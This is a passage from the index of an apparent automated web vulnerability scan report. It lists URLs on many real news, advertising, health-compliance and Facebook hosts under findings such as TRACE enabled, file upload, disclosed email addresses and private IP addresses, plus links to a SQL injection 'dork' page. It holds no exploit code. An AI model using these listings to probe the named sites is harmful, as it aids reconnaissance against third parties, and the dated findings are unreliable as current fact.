23.115. http://www.glammedia.com/about_glam/news/in_the_news.php

23.116. http://www.glammedia.com/about_glam/news/press_room.php

23.117. http://www.glammedia.com/about_glam/our_people/management.php

23.118. http://www.glammedia.com/about_glam/our_properties/bliss.php

23.119. http://www.glammedia.com/about_glam/our_properties/brash.php

23.120. http://www.glammedia.com/about_glam/our_properties/glam_owned_and_operated_sites.php

23.121. http://www.glammedia.com/about_glam/our_properties/glamsocial.php

23.122. http://www.glammedia.com/about_glam/our_properties/glamtv.php

23.123. http://www.glammedia.com/about_glam/our_properties/subscribe_rss.php

23.124. http://www.glammedia.com/about_glam/our_properties/tinker.php

23.125. http://www.glammedia.com/about_glam/our_story/index.php

23.126. http://www.glammedia.com/about_glam/our_story/our_story.php

23.127. http://www.glammedia.com/advertisers/

23.128. http://www.glammedia.com/advertisers/adaptive.php

23.129. http://www.glammedia.com/advertisers/audience.php

23.130. http://www.glammedia.com/advertisers/capabilities.php

23.131. http://www.glammedia.com/advertisers/certifications/index.php

23.132. http://www.glammedia.com/advertisers/clients/index.php

23.133. http://www.glammedia.com/advertisers/index.php

23.134. http://www.glammedia.com/advertisers/ourwork/index.php

23.135. http://www.glammedia.com/advertisers/specifications/index.php

23.136. http://www.glammedia.com/advertisers/submit_rfp.php

23.137. http://www.glammedia.com/advertisers/targeting.php

23.138. http://www.glammedia.com/contact_us/

23.139. http://www.glammedia.com/contact_us/contact_us.php

23.140. http://www.glammedia.com/contact_us/index.php

23.141. http://www.glammedia.com/contact_us/jobs/index.php

23.142. http://www.glammedia.com/contact_us/location/index.php

23.143. http://www.glammedia.com/index.php

23.144. http://www.glammedia.com/international/

23.145. http://www.glammedia.com/partners/index.php

23.146. http://www.glammedia.com/partners/rss.php

23.147. http://www.glammedia.com/publishers/glam_publisher_network/

23.148. http://www.glammedia.com/publishers/glam_publisher_network/apply_now.php

23.149. http://www.glammedia.com/publishers/glam_publisher_network/directory_of_glam_sites.php

23.150. http://www.glammedia.com/publishers/glam_publisher_network/index.php

23.151. http://www.glammedia.com/publishers/glam_publisher_network/site_requirements.php

23.152. http://www.glammedia.com/publishers/glam_publisher_network/why_join_the_network.php

23.153. http://www.guardian.co.uk/music/2011/may/01/ray-davies-kinks-meltdown-interview

23.154. http://www.hipaa-101.com/

23.155. http://www.hostessblog.com/2011/04/royal-wedding-theme-printables-part-2/

23.156. https://www.idexpertscorp.com/membership/

23.157. http://www.infocrossing.com/

23.158. http://www.inspiredelearning.com/inspired/request.info.htm

23.159. http://www.inspiredelearning.com/privacy/hipaa.pricing.htm

23.160. http://www.inspiredelearning.com/privacy/hipaa.privacy.security.htm

23.161. http://www.islandpacket.com/2011/05/02/1640363/will-killing-osama-kill-the-movement.html

23.162. http://www.logrhythm.com/

23.163. http://www.myspace.com/serverSideIframeModifier.html

23.164. http://www.news.com.au/breaking-news/national/christmas-island-detainee-sews-lips-together/story-e6frfku9-1226044502823

23.165. http://www.nexica.com/error404.aspx

23.166. http://www.orbitcast.com/

23.167. http://www.orbitcast.com/archives.html

23.168. http://www.orbitcast.com/contact/

23.169. http://www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.REDACTED.com|REDACTED.com/wonderwall|v14.REDACTED.com/|preview.REDACTED.com/|www.REDACTED.com/preview.aspx|mtv.com/videos/|mtv.com/

23.170. http://www.patlive.com/appointment-scheduling/

23.171. http://www.perthnow.com.au/news/fresh-rooftop-protest-by-asylum-seekers-despite-crackdown/story-e6frg12c-1226045349903

23.172. http://www.perthnow.com.au/news/western-australia/christmas-island-kill-accused-lashed-out-with-knife/story-e6frg13u-1226046333217

23.173. http://www.perthnow.com.au/news/western-australia/two-asylum-seekers-attempt-suicide-at-airport-detention-centre/story-e6frg13u-1226040848142

23.174. http://www.playtexbramakeover.com/

23.175. http://www.righthealth.com/topic/What_Is_Hipaa

23.176. http://www.saksfifthavenue.com/main/ProductDetail.jsp

23.177. http://www.servicemax.com/landing/adwords/aberdeen-scheduling.html

23.178. http://www.sfaxme.com/index.php

23.179. http://www.shadowtrack.com/index.php

23.180. http://www.shopstyle.com/browse

23.181. http://www.skynews.com.au/businessnews/article.aspx

23.182. http://www.skynews.com.au/finance/article.aspx

23.183. http://www.skynews.com.au/national/article.aspx

23.184. http://www.skynews.com.au/showbiz/article.aspx

23.185. http://www.skynews.com.au/sport/article.aspx

23.186. http://www.skynews.com.au/tech/article.aspx

23.187. http://www.skynews.com.au/topstories/article.aspx

23.188. http://www.smh.com.au/action/printArticle

23.189. http://www.smh.com.au/national/roof-sitin-at-christmas-island-20110426-1dv4v.html

23.190. http://www.strausnews.com/

23.191. http://www.strausnews.com/articles/2011/05/02/warwick_advertiser/news/25.txt

23.192. http://www.stumbleupon.com/submit

23.193. http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.REDACTED.com|REDACTED.com/wonderwall|v14.REDACTED.com/|preview.REDACTED.com/|www.REDACTED.com/preview.aspx|mtv.com/videos/|mtv.com/

23.194. http://www.tek.com/

23.195. http://www.tek.com/Measurement/cgi-bin/live-quote.cgi

23.196. http://www.tek.com/applications/computing.html

23.197. http://www.tek.com/home/products.html

23.198. http://www.tek.com/products/logic-analyzer/

23.199. http://www.tek.com/products/logic-analyzer/tla6000/

23.200. http://www.theage.com.au/action/printArticle

23.201. http://www.theage.com.au/national/christmas-island-action-adds-to-villawood-woes-20110425-1du6x.html

23.202. http://www.theaustralian.com.au/news/detention-protests-spread-across-country/story-e6frg6n6-1226044228620

23.203. http://www.theaustralian.com.au/news/nation/abbott-a-hero-on-troubled-christmas-island/story-e6frg6nf-1226045245809

23.204. http://www.theaustralian.com.au/news/nation/third-asylum-seeker-boat-this-month-off-christmas-island/story-e6frg6nf-1226040623081

23.205. http://www.thefashionablegal.com/

23.206. http://www.thefashionablegal.com/04/2011/interview-with-rob-zangardi-and-mariel-haenn/

23.207. http://www.thefashionablegal.com/04/2011/spring-fashion-trends/

23.208. http://www.thefashionablegal.com/wp-content/themes/lifestyle_40/leaderboard.php

23.209. http://www.thefashionablegal.com/wp-content/themes/lifestyle_40/leaderboard.php

23.210. http://www.thefashionablegal.com/wp-content/themes/lifestyle_40/leaderboard.php

23.211. http://www.thefashionablegal.com/wp-content/themes/lifestyle_40/leaderboard.php

23.212. http://www.thefashionablegal.com/wp-content/themes/lifestyle_40/leaderboard.php

23.213. http://www.thefashionablegal.com/wp-content/themes/lifestyle_40/leaderboard.php

23.214. http://www.thefashionablegal.com/wp-login.php

23.215. http://www.thefashionablehousewife.com/wp-login.php

23.216. http://www.thesunchronicle.com/

23.217. http://www.thesunchronicle.com/articles/2011/05/02/rehoboth/9166782.txt

23.218. http://www.thesunchronicle.com/rehoboth/real_estate/

23.219. http://www.topcareerschools.com/s/279-390/12823153/

23.220. http://www.truelocal.com.au/

23.221. http://www.twisted-silver.com/

23.222. http://www.watoday.com.au/action/printArticle

23.223. http://www.watoday.com.au/wa-news/hunger-strike-starts-on-christmas-island-20110427-1dw45.html

23.224. http://www.watoday.com.au/wa-news/perth-asylum-seekers-threaten-hanging-20110418-1dkp1.html

23.225. http://www.webhostingtalk.com/showthread.php

23.226. http://www.webmgr8.com/index.cfm

23.227. http://www.wiseshop.com/contact.html

23.228. http://www.wiseshop.com/shop.php

23.229. http://www.wiseshop.com/sign_up.html

23.230. http://www.xinhuanet.com/english2010/odd/index.htm

23.231. http://www.youtube.com/results

23.232. http://www2.idexpertscorp.com/

23.233. http://www2.idexpertscorp.com/blog/

23.234. http://www2.idexpertscorp.com/blog/single/are-we-getting-any-smarter/

23.235. http://www2.idexpertscorp.com/blog/tags/tag/breach+notification/

23.236. http://www2.idexpertscorp.com/breach-tools/breach-healthcheck/

23.237. http://www2.idexpertscorp.com/breach-tools/radar-for-phi-1/

23.238. http://www2.idexpertscorp.com/contact/

23.239. http://www2.idexpertscorp.com/page-not-found/

23.240. http://www2.tek.com/cmswpt/prfinder.lotr

23.241. http://www2.tek.com/price/tk_ec_pricepage.msrp

23.242. http://xss.cx/2011/05/02/dork/sql-injection-database-error-cwe89-capec66-dork-ghdb-www2idexpertscorpcom.html

24. File upload functionality

25. TRACE method is enabled

25.1. http://a.dlqm.net/

25.2. http://ad.linksynergy.com/

25.3. http://ads.specificmedia.com/

25.4. http://arts.onbloglist.com/

25.5. https://auth.tek.com/

25.6. http://cache.daylife.com/

25.7. http://cache.specificmedia.com/

25.8. http://cheetah.vizu.com/

25.9. http://dlx.specificclick.net/

25.10. http://feeds.glam.com/

25.11. http://glam.grapeshot.co.uk/

25.12. http://image2.pubmatic.com/

25.13. http://lp.idexpertscorp.com/

25.14. http://mm.chitika.net/

25.15. http://news.xinhuanet.com/

25.16. http://optimized-by.rubiconproject.com/

25.17. http://puma.vizu.com/

25.18. http://r.openx.net/

25.19. http://rd.apmebf.com/

25.20. http://secure-au.imrworldwide.com/

25.21. http://twittercounter.com/

25.22. http://widget.linkwithin.com/

25.23. http://widget2.linkwithin.com/

25.24. http://www.giveawayscout.com/

25.25. http://www.glam.de/

25.26. http://www.glam.jp/

25.27. http://www.glamadapt.com/

25.28. http://www.guardian.co.uk/

25.29. http://www.hipaa-101.com/

25.30. http://www.hipaastore.com/

25.31. https://www.hipaastore.com/

25.32. http://www.isecauditors.com/

25.33. http://www.orgsites.com/

25.34. https://www.placemyad.com.au/

25.35. http://www.shadowtrack.com/

25.36. http://www.stumbleupon.com/

25.37. http://www.stylemepretty.com/

25.38. http://www.tek.com/

25.39. http://www.thehousehuntershandbook.com/

25.40. http://www.topcareerschools.com/

25.41. http://www.trizetto.com/

25.42. http://www30a2-orig.glam.com/

25.43. http://xads.zedo.com/

25.44. http://yads.zedo.com/

26. Email addresses disclosed

26.1. http://a.ads1.msads.net/ads/1/0000000001_000000000000000151527.gif

26.2. http://ads.adbrite.com/adserver/behavioral-data/8201

26.3. http://ads.adbrite.com/adserver/behavioral-data/8204

26.4. http://ads.adbrite.com/adserver/vdi/682865

26.5. http://ads.adbrite.com/adserver/vdi/682865

26.6. http://ads.adbrite.com/adserver/vdi/682865

26.7. http://ads.adbrite.com/adserver/vdi/682865

26.8. http://ads.adbrite.com/adserver/vdi/682865

26.9. http://ads.adbrite.com/adserver/vdi/712156

26.10. http://ads.adbrite.com/adserver/vdi/742697

26.11. http://ads.adbrite.com/adserver/vdi/753292

26.12. http://ads.adbrite.com/adserver/vdi/779045

26.13. http://ads.adbrite.com/adserver/vdi/779045

26.14. http://ads.adbrite.com/adserver/vdi/779045

26.15. http://ads.adbrite.com/adserver/vdi/810647

26.16. http://ads.adbrite.com/adserver/vdi/810647

26.17. http://ads.adbrite.com/adserver/vdi/810647

26.18. http://ads.adbrite.com/adserver/vdi/830697

26.19. http://ads.adbrite.com/adserver/vdi/830697

26.20. http://ads1.msads.net/ads/1/0000000001_000000000000000151527.gif

26.21. http://ads2.adbrite.com/v0/ad

26.22. http://ads2.adbrite.com/v0/ad

26.23. http://ads2.adbrite.com/v0/ad

26.24. http://ads2.adbrite.com/v0/ad

26.25. http://ads2.adbrite.com/v0/ad

26.26. http://ads2.adbrite.com/v0/ad

26.27. http://ads2.adbrite.com/v0/ad

26.28. http://ads2.adbrite.com/v0/ad

26.29. http://ads2.adbrite.com/v0/ad

26.30. http://ads2.adbrite.com/v0/ad

26.31. http://ads2.adbrite.com/v0/ad

26.32. http://ads2.adbrite.com/v0/ad

26.33. http://ads2.adbrite.com/v0/ad

26.34. http://ads2.adbrite.com/v0/ad

26.35. http://ads2.adbrite.com/v0/ad

26.36. http://ads2.adbrite.com/v0/ad

26.37. http://ads2.adbrite.com/v0/ad

26.38. http://api.trulia.com/getListings.php

26.39. https://auth.tek.com/mytek/faces/scripts/webservice.js

26.40. https://clientcommunity.touchnet.com/web/login.action

26.41. https://clientcommunity.touchnet.com/web/s/2042/1452/1.2.2/_/download/batch/com.atlassian.confluence.plugins.doctheme:splitter/com.atlassian.confluence.plugins.doctheme:splitter.js

26.42. http://e-sites2.tek.com/mytek/faces/scripts/webservice.js

26.43. http://idexperts.wufoo.com/scripts/public/dynamic.14565.js

26.44. http://maps.gstatic.com/cat_js/intl/en_us/mapfiles/334b/maps2/%7Bmod_util,mod_strr,mod_adf,mod_act_s,mod_mssvt,mod_actbr,mod_appiw%7D.js

26.45. http://media.islandpacket.com/scripts/jquery.hoverIntent.minified.js

26.46. http://mediacdn.disqus.com/1304107721/build/system/disqus.js

26.47. http://news.9REDACTED.com.au/js/top_combined.js

26.48. http://news.xinhuanet.com/english2010/world/2011-05/02/c_13855230.htm

26.49. http://resources.brisbanetimes.com.au/common/media-common-1.0/js/fdjsf/output/fd.omniture.brisbanetimes_min.js

26.50. http://resources.smh.com.au/common/media-common-1.0/js/fdjsf/output/fd.omniture.smh_min.js

26.51. http://resources.theage.com.au/common/media-common-1.0/js/fdjsf/output/fd.omniture.theage_min.js

26.52. http://resources.watoday.com.au/common/media-common-1.0/js/fdjsf/output/fd.omniture.watoday_min.js

26.53. http://resources1.news.com.au/cs/js/base-modules-min.js

26.54. http://shared.9REDACTED.com.au/share/com/js/nineREDACTED.ysmgenerator.js

26.55. http://shared.9REDACTED.com.au/share/com/js/survey.js

26.56. http://static.guim.co.uk/static/104228/common/external-scripts/jquery-libraries/jquery.cookie.js

26.57. http://static.playtexbramakeover.com/assets/js/swfIN.js

26.58. https://tracker.i-structure.com/

26.59. http://w.sharethis.com/button/buttons.js

26.60. http://widgets.twimg.com/j/2/widget.js

26.61. http://www.afewgoodygumdrops.com/2011/04/few-goody-gumdrops-reviews-christian.html

26.62. http://www.dailytelegraph.com.au/news/breaking-news/tony-abbott-says-migration-proposals-are-weak/story-e6freuz0-1226045133021

26.63. http://www.glam.com/topic/

26.64. http://www.glam.com/videos/

26.65. http://www.glammedia.com/about_glam/legal/copyright_policy.php

26.66. http://www.glammedia.com/about_glam/legal/optout.php

26.67. http://www.glammedia.com/about_glam/legal/privacy.php

26.68. http://www.glammedia.com/about_glam/legal/privacyandsecuritypolicy-previousversion9-12-2007.php

26.69. http://www.glammedia.com/about_glam/legal/terms_of_use.php

26.70. http://www.glammedia.com/about_glam/news/in_the_news.php

26.71. http://www.glammedia.com/about_glam/news/press_room.php

26.72. http://www.glammedia.com/about_glam/our_people/management.php

26.73. http://www.glammedia.com/about_glam/our_properties/bliss.php

26.74. http://www.glammedia.com/about_glam/our_properties/brash.php

26.75. http://www.glammedia.com/about_glam/our_properties/glam_owned_and_operated_sites.php

26.76. http://www.glammedia.com/about_glam/our_properties/glamsocial.php

26.77. http://www.glammedia.com/about_glam/our_properties/glamtv.php

26.78. http://www.glammedia.com/about_glam/our_properties/subscribe_rss.php

26.79. http://www.glammedia.com/about_glam/our_properties/tinker.php

26.80. http://www.glammedia.com/about_glam/our_story/index.php

26.81. http://www.glammedia.com/about_glam/our_story/our_story.php

26.82. http://www.glammedia.com/advertisers/

26.83. http://www.glammedia.com/advertisers/adaptive.php

26.84. http://www.glammedia.com/advertisers/audience.php

26.85. http://www.glammedia.com/advertisers/capabilities.php

26.86. http://www.glammedia.com/advertisers/index.php

26.87. http://www.glammedia.com/advertisers/specifications/index.php

26.88. http://www.glammedia.com/advertisers/submit_rfp.php

26.89. http://www.glammedia.com/advertisers/targeting.php

26.90. http://www.glammedia.com/contact_us/

26.91. http://www.glammedia.com/contact_us/contact_us.php

26.92. http://www.glammedia.com/contact_us/index.php

26.93. http://www.glammedia.com/contact_us/jobs/index.php

26.94. http://www.glammedia.com/contact_us/location/index.php

26.95. http://www.glammedia.com/international/

26.96. http://www.glammedia.com/publishers/glam_publisher_network/

26.97. http://www.glammedia.com/publishers/glam_publisher_network/apply_now.php

26.98. http://www.glammedia.com/publishers/glam_publisher_network/index.php

26.99. http://www.glammedia.com/publishers/glam_publisher_network/site_requirements.php

26.100. http://www.glammedia.com/publishers/glam_publisher_network/why_join_the_network.php

26.101. http://www.guardian.co.uk/music/2011/may/01/ray-davies-kinks-meltdown-interview

26.102. http://www.hipaasolutions.org/

26.103. http://www.hipaasolutions.org/about_us.htm

26.104. https://www.idexpertscorp.com/RADAR/

26.105. https://www.idexpertscorp.com/dbhc/

26.106. https://www.idexpertscorp.com/js/events.js

26.107. http://www.infocrossing.com/includes/js/jquery.dimensions.pack.js

26.108. http://www.inspiredelearning.com/Controls/Drop_down-2008.js

26.109. http://www.inspiredelearning.com/inspired/request.info.htm

26.110. http://www.inspiredelearning.com/privacy/hipaa.pricing.htm

26.111. http://www.logrhythm.com/

26.112. http://www.logrhythm.com/Resources/Shared/scripts/DotNetNukeAjaxShared.js

26.113. http://www.logrhythm.com/Resources/Shared/scripts/widgets.js

26.114. http://www.logrhythm.com/controls/SolpartMenu/spmenu.js

26.115. http://www.orbitcast.com/contact/

26.116. http://www.perthnow.com.au/news/fresh-rooftop-protest-by-asylum-seekers-despite-crackdown/story-e6frg12c-1226045349903

26.117. http://www.perthnow.com.au/news/western-australia/christmas-island-kill-accused-lashed-out-with-knife/story-e6frg13u-1226046333217

26.118. http://www.perthnow.com.au/news/western-australia/two-asylum-seekers-attempt-suicide-at-airport-detention-centre/story-e6frg13u-1226040848142

26.119. http://www.righthealth.com/topic/What_Is_Hipaa

26.120. http://www.servicemax.com/landing/adwords/aberdeen-scheduling.html

26.121. http://www.strausnews.com/StrausCommunityGuide2010/includes/communityguide.css

26.122. http://www.strausnews.com/articles/2011/05/02/warwick_advertiser/news/25.txt

26.123. http://www.strausnews.com/local_farmers/includes/farmers.css

26.124. http://www.tek.com/

26.125. http://www.thefashionablegal.com/

26.126. http://www.thefashionablegal.com/04/2011/interview-with-rob-zangardi-and-mariel-haenn/

26.127. http://www.thefashionablegal.com/04/2011/spring-fashion-trends/

26.128. http://www.thehousehuntershandbook.com/public/listingSingle.do

26.129. http://www.thesunchronicle.com/

26.130. http://www.thesunchronicle.com/articles/2011/05/02/rehoboth/9166782.txt

26.131. http://www.thesunchronicle.com/rehoboth/real_estate/

26.132. http://www.touchnet.com/web/s/2042/1452/1.2.2/_/download/batch/com.atlassian.confluence.plugins.doctheme:splitter/com.atlassian.confluence.plugins.doctheme:splitter.js

26.133. http://www.trizetto.com/company/contactUs.asp

26.134. http://www.watoday.com.au/action/printArticle

26.135. http://www.watoday.com.au/wa-news/hunger-strike-starts-on-christmas-island-20110427-1dw45.html

26.136. http://www.watoday.com.au/wa-news/perth-asylum-seekers-threaten-hanging-20110418-1dkp1.html

26.137. http://www.webhostingtalk.com/showthread.php

26.138. http://www.wiseshop.com/compactor.cjs

26.139. http://www.xinhuanet.com/english2010/static/top_xilan.htm

26.140. http://www2.idexpertscorp.com/

26.141. http://www2.idexpertscorp.com/blog/

26.142. http://www2.idexpertscorp.com/blog/single/are-we-getting-any-smarter/

26.143. http://www2.idexpertscorp.com/blog/tags/tag/breach+notification/

26.144. http://www2.idexpertscorp.com/breach-tools/breach-healthcheck/

26.145. http://www2.idexpertscorp.com/breach-tools/radar-for-phi-1/

26.146. http://www2.idexpertscorp.com/contact/

26.147. http://www2.idexpertscorp.com/js/hoverintent.js

26.148. http://www2.idexpertscorp.com/js/innerfade.js

26.149. http://www2.idexpertscorp.com/page-not-found/

26.150. http://xss.cx/2011/05/02/dork/sql-injection-database-error-cwe89-capec66-dork-ghdb-www2idexpertscorpcom.html

27. Private IP addresses disclosed

27.1. http://api.facebook.com/restserver.php

27.2. http://api.facebook.com/restserver.php

27.3. http://check4.connect.facebook.com/ajax/v6.php

27.4. http://check4.connect.facebook.com/ajax/v6.php

27.5. http://check4.facebook.com/ajax/v6.php

27.6. http://check4.facebook.com/ajax/v6.php

27.7. http://check4.facebook.com/ajax/v6.php

27.8. http://check4.facebook.com/ajax/v6.php

27.9. http://check4.facebook.com/ajax/v6.php

27.10. http://check4.facebook.com/ajax/v6.php

27.11. http://check4.facebook.com/ajax/v6.php

27.12. http://check4.facebook.com/ajax/v6.php

27.13. http://check4.facebook.com/ajax/v6.php

27.14. http://check4.facebook.com/ajax/v6.php

27.15. http://check4.facebook.com/ajax/v6.php

27.16. http://check4.facebook.com/ajax/v6.php

27.17. http://check4.facebook.com/ajax/v6.php

27.18. http://check4.facebook.com/ajax/v6.php

27.19. http://check4.facebook.com/ajax/v6.php

27.20. http://check4.facebook.com/ajax/v6.php

27.21. http://check4.facebook.com/ajax/v6.php

27.22. http://check4.facebook.com/ajax/v6.php

27.23. http://check4.facebook.com/ajax/v6.php

27.24. http://check4.facebook.com/ajax/v6.php

27.25. http://check4.facebook.com/ajax/v6.php

27.26. http://check4.facebook.com/ajax/v6.php

27.27. http://check4.facebook.com/ajax/v6.php

27.28. http://check4.facebook.com/ajax/v6.php

27.29. http://check4.facebook.com/ajax/v6.php

27.30. http://check4.facebook.com/ajax/v6.php

27.31. http://check4.facebook.com/ajax/v6.php

27.32. http://check4.facebook.com/ajax/v6.php

27.33. http://check4.facebook.com/ajax/v6.php

27.34. http://check4.facebook.com/ajax/v6.php

27.35. http://check4.facebook.com/ajax/v6.php

27.36. http://check4.facebook.com/ajax/v6.php

27.37. http://check6.connect.facebook.com/ajax/v6.php

27.38. http://check6.connect.facebook.com/ajax/v6.php

27.39. http://check6.facebook.com/ajax/v6.php

27.40. http://check6.facebook.com/ajax/v6.php

27.41. http://check6.facebook.com/ajax/v6.php

27.42. http://check6.facebook.com/ajax/v6.php

27.43. http://check6.facebook.com/ajax/v6.php

27.44. http://check6.facebook.com/ajax/v6.php

27.45. http://check6.facebook.com/ajax/v6.php

27.46. http://check6.facebook.com/ajax/v6.php

27.47. http://check6.facebook.com/ajax/v6.php

27.48. http://check6.facebook.com/ajax/v6.php

27.49. http://check6.facebook.com/ajax/v6.php

27.50. http://check6.facebook.com/ajax/v6.php

27.51. http://check6.facebook.com/ajax/v6.php

27.52. http://check6.facebook.com/ajax/v6.php

27.53. http://check6.facebook.com/ajax/v6.php

27.54. http://check6.facebook.com/ajax/v6.php

27.55. http://check6.facebook.com/ajax/v6.php

27.56. http://check6.facebook.com/ajax/v6.php

27.57. http://check6.facebook.com/ajax/v6.php

27.58. http://check6.facebook.com/ajax/v6.php

27.59. http://check6.facebook.com/ajax/v6.php

27.60. http://check6.facebook.com/ajax/v6.php

27.61. http://check6.facebook.com/ajax/v6.php

27.62. http://check6.facebook.com/ajax/v6.php

27.63. http://check6.facebook.com/ajax/v6.php

27.64. http://check6.facebook.com/ajax/v6.php

27.65. http://check6.facebook.com/ajax/v6.php

27.66. http://check6.facebook.com/ajax/v6.php

27.67. http://check6.facebook.com/ajax/v6.php

27.68. http://check6.facebook.com/ajax/v6.php

27.69. http://check6.facebook.com/ajax/v6.php

27.70. http://check6.facebook.com/ajax/v6.php

27.71. http://connect.facebook.net/en_US/all.js

27.72. http://delb.opt.fimserve.com/adopt/

27.73. http://delb.opt.fimserve.com/adopt/

27.74. http://demr.opt.fimserve.com/adopt/

27.75. http://desb.opt.fimserve.com/adopt/

27.76. http://media.dailytelegraph.com.au/fe/2011/mar/gallerybook/jquery-galleryBook.js

27.77. http://static.ak.connect.facebook.com/images/connect_sprite.png

27.78. http://static.ak.connect.facebook.com/images/loaders/indicator_white_large.gif

27.79. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US

27.80. http://static.ak.fbcdn.net/connect.php/js/FB.Share

27.81. http://static.ak.fbcdn.net/connect/xd_proxy.php

27.82. http://static.ak.fbcdn.net/images/connect_sprite.png

27.83. http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/uerQhlzUjfV.js

27.84. http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/8bLZwyyAK4a.js

27.85. http://static.ak.fbcdn.net/rsrc.php/v1/yj/r/QyZCsJKRLP8.css

27.86. http://static.ak.fbcdn.net/rsrc.php/v1/zX/r/i_oIVTKMYsL.png

27.87. http://static.ak.fbcdn.net/rsrc.php/v1/zx/r/zZEOQP4uOC1.gif

27.88. https://support.logrhythm.com/FileManagement/Download/08bdb7021bc34da1829ccb8c216d97ba

27.89. https://support.logrhythm.com/FileManagement/Download/e04c558f41be497b8f6340964105111b

27.90. http://www.blogcatalog.com/images/buttons/blogcatalog5.gif

27.91. http://www.businessspectator.com.au/bs.nsf/Article/Labor-NBN-carbon-tax-broadband-Julia-Gillard-Tony--pd20110502-GFSXJ

27.92. http://www.connect.facebook.com/common/scribe_endpoint.php

27.93. http://www.connect.facebook.com/common/scribe_endpoint.php

27.94. http://www.connect.facebook.com/widgets/fan.php

27.95. http://www.connect.facebook.com/widgets/fan.php

27.96. http://www.facebook.com/common/scribe_endpoint.php

27.97. http://www.facebook.com/common/scribe_endpoint.php

27.98. http://www.facebook.com/common/scribe_endpoint.php

27.99. http://www.facebook.com/common/scribe_endpoint.php

27.100. http://www.facebook.com/common/scribe_endpoint.php

27.101. http://www.facebook.com/common/scribe_endpoint.php

27.102. http://www.facebook.com/common/scribe_endpoint.php

27.103. http://www.facebook.com/common/scribe_endpoint.php

27.104. http://www.facebook.com/common/scribe_endpoint.php

27.105. http://www.facebook.com/common/scribe_endpoint.php

27.106. http://www.facebook.com/common/scribe_endpoint.php

27.107. http://www.facebook.com/common/scribe_endpoint.php

27.108. http://www.facebook.com/common/scribe_endpoint.php

27.109. http://www.facebook.com/common/scribe_endpoint.php

27.110. http://www.facebook.com/common/scribe_endpoint.php

27.111. http://www.facebook.com/common/scribe_endpoint.php

27.112. http://www.facebook.com/common/scribe_endpoint.php

27.113. http://www.facebook.com/common/scribe_endpoint.php

27.114. http://www.facebook.com/common/scribe_endpoint.php

27.115. http://www.facebook.com/common/scribe_endpoint.php

27.116. http://www.facebook.com/common/scribe_endpoint.php

27.117. http://www.facebook.com/common/scribe_endpoint.php

27.118. http://www.facebook.com/common/scribe_endpoint.php

27.119. http://www.facebook.com/common/scribe_endpoint.php

27.120. http://www.facebook.com/common/scribe_endpoint.php

27.121. http://www.facebook.com/common/scribe_endpoint.php

27.122. http://www.facebook.com/common/scribe_endpoint.php

27.123. http://www.facebook.com/common/scribe_endpoint.php

27.124. http://www.facebook.com/common/scribe_endpoint.php

27.125. http://www.facebook.com/common/scribe_endpoint.php

27.126. http://www.facebook.com/common/scribe_endpoint.php

27.127. http://www.facebook.com/common/scribe_endpoint.php

27.128. http://www.facebook.com/common/scribe_endpoint.php

27.129. http://www.facebook.com/common/scribe_endpoint.php

27.130. http://www.facebook.com/common/scribe_endpoint.php

27.131. http://www.facebook.com/common/scribe_endpoint.php

27.132. http://www.facebook.com/common/scribe_endpoint.php

27.133. http://www.facebook.com/common/scribe_endpoint.php

27.134. http://www.facebook.com/common/scribe_endpoint.php

27.135. http://www.facebook.com/common/scribe_endpoint.php

27.136. http://www.facebook.com/common/scribe_endpoint.php

27.137. http://www.facebook.com/common/scribe_endpoint.php

27.138. http://www.facebook.com/extern/login_status.php

27.139. http://www.facebook.com/extern/login_status.php

27.140. http://www.facebook.com/extern/login_status.php

27.141. http://www.facebook.com/extern/login_status.php

27.142. http://www.facebook.com/extern/login_status.php

27.143. http://www.facebook.com/extern/login_status.php

27.144. http://www.facebook.com/extern/login_status.php

27.145. http://www.facebook.com/extern/login_status.php

27.146. http://www.facebook.com/extern/login_status.php

27.147. http://www.facebook.com/extern/login_status.php

27.148. http://www.facebook.com/extern/login_status.php

27.149. http://www.facebook.com/extern/login_status.php

27.150. http://www.facebook.com/extern/login_status.php

27.151. http://www.facebook.com/extern/login_status.php

27.152. http://www.facebook.com/extern/login_status.php

27.153. http://www.facebook.com/extern/login_status.php

27.154. http://www.facebook.com/extern/login_status.php

27.155. http://www.facebook.com/home.php

27.156. http://www.facebook.com/home.php

27.157. http://www.facebook.com/plugins/activity.php

27.158. http://www.facebook.com/plugins/activity.php

27.159. http://www.facebook.com/plugins/activity.php

27.160. http://www.facebook.com/plugins/activity.php

27.161. http://www.facebook.com/plugins/activity.php

27.162. http://www.facebook.com/plugins/activity.php

27.163. http://www.facebook.com/plugins/activity.php

27.164. http://www.facebook.com/plugins/activity.php

27.165. http://www.facebook.com/plugins/facepile.php

27.166. http://www.facebook.com/plugins/like.php

27.167. http://www.facebook.com/plugins/like.php

27.168. http://www.facebook.com/plugins/like.php

27.169. http://www.facebook.com/plugins/like.php

27.170. http://www.facebook.com/plugins/like.php

27.171. http://www.facebook.com/plugins/like.php

27.172. http://www.facebook.com/plugins/like.php

27.173. http://www.facebook.com/plugins/like.php

27.174. http://www.facebook.com/plugins/like.php

27.175. http://www.facebook.com/plugins/like.php

27.176. http://www.facebook.com/plugins/like.php

27.177. http://www.facebook.com/plugins/like.php

27.178. http://www.facebook.com/plugins/like.php

27.179. http://www.facebook.com/plugins/like.php

27.180. http://www.facebook.com/plugins/like.php

27.181. http://www.facebook.com/plugins/like.php

27.182. http://www.facebook.com/plugins/like.php

27.183. http://www.facebook.com/plugins/like.php

27.184. http://www.facebook.com/plugins/like.php

27.185. http://www.facebook.com/plugins/like.php

27.186. http://www.facebook.com/plugins/like.php

27.187. http://www.facebook.com/plugins/like.php

27.188. http://www.facebook.com/plugins/like.php

27.189. http://www.facebook.com/plugins/like.php

27.190. http://www.facebook.com/plugins/like.php

27.191. http://www.facebook.com/plugins/likebox.php

27.192. http://www.facebook.com/plugins/likebox.php

27.193. http://www.facebook.com/plugins/likebox.php

27.194. http://www.facebook.com/plugins/likebox.php

27.195. http://www.facebook.com/plugins/likebox.php

27.196. http://www.facebook.com/plugins/likebox.php

27.197. http://www.facebook.com/plugins/likebox.php

